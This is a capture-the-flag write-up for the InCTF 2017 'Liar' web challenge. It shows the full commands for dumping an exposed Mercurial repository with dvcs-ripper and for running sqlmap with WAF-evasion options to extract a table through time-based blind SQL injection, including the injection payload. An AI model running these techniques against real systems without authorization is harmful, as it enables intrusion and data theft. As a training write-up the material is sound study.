InCTF 2017 - Write-up

Information#

Version#

By	Version	Comment
noraj	1.0	Creation

CTF#

• Name : InCTF 2017
• Website : ctf.inctf.in
• Type : Online
• Format : Jeopardy
• CTF Time : link

300 - Liar - Web#

We don't have anything in our website.

Link

The is a VCS exposed by the web server. Git is not the only VCS, here we have a mercurial repository. I used DVCS-ripper to dump the repository:

$ ~/CTF/tools/dvcs-ripper/rip-hg.pl -v -u http://liar.inctf.in/.hg/
[i] Downloading hg files from http://liar.inctf.in/.hg/
[i] Auto-detecting 404 as 200 with 3 requests
[i] Getting correct 404 responses
[d] found 00changelog.i
[d] found dirstate
[d] found requires
[d] found branch
[!] Not found for branchheads.cache: 404 Not Found
[d] found last-message.txt
[!] Not found for tags.cache: 404 Not Found
[d] found undo.branch
[d] found undo.desc
[d] found undo.dirstate
[d] found store/00changelog.i
[!] Not found for store/00changelog.d: 404 Not Found
[d] found store/00manifest.i
[!] Not found for store/00manifest.d: 404 Not Found
[d] found store/fncache
[d] found store/undo
[!] Not found for .hgignore: 404 Not Found
[i] Running hg status to check for missing items
[i] Got items with hg status: 3
[!] Not found for store/data/.hgignore.d: 404 Not Found
[!] Not found for store/data/.hgignore.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/index.html.i: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.d: 404 Not Found
[!] Not found for store/data/1ts_h4rd_t0_gu3ss/vulnerable.php.i: 404 Not Found
[!] Not found for store/data/index.html.d: 404 Not Found
[d] found store/data/index.html.i
[i] Finished (1 of 4)

We can see there are other files on the web server (not available on the mercurial repository).

$ hg status
! .hgignore
! 1ts_h4rd_t0_gu3ss/index.html
! 1ts_h4rd_t0_gu3ss/vulnerable.php

1ts_h4rd_t0_gu3ss/index.html has a form that send to 1ts_h4rd_t0_gu3ss/vulnerable.php and there is a comment hidden in the sources

<!--Could You beat our security!!!--!>
        <!--Can you find the phone number of my friend, I guess it is stored in some table, I think it is in phone column--!>

So there is an SQL injection. I tried manually to test if some stuff were filtered. I saw that all SQL kerwords were detected by a WAF but using versionned keywords worked.

Then I tried with SQLmap but the WAF detected an automated tool so I told SQLmap to use a custom user-agent and to use my cookie.

Then we have a classic time-based blind SQLi.

$ sqlmap -u http://liar.inctf.in/1ts_h4rd_t0_gu3ss/vulnerable.php --method=POST --data='name=john' --dump --user-agent='Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0' --cookie='__cfduid=da3d6e025cbfedf0e2f3e6a695f45bdaf1513502488' --tamper=versionedkeywords --dbms=mysql -v 3 --level 2 --risk 3

[...]

Parameter: name (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: name=john') OR SLEEP(5) AND ('PuTF'='PuTF
    Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

[...]

web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12

[...]

Database: CTF
Table: gu3ss1ng_must_n0t_h4pp3n
[5 entries]
+--------------------------------+----------------+---------+
| phone                          | email          | user    |
+--------------------------------+----------------+---------+
| 12345                          | admin@bi0s.com | <blank> |
| inctf{H0w_@b0Ut_@n_r3@L_1nJ3c} | InCTF flag     | <blank> |
| 100                            | rahul@bi0s.com | <blank> |
| 900                            | ram@google.com | <blank> |
| 123456                         | ram@yahoo.com  | <blank> |
+--------------------------------+----------------+---------+

[...]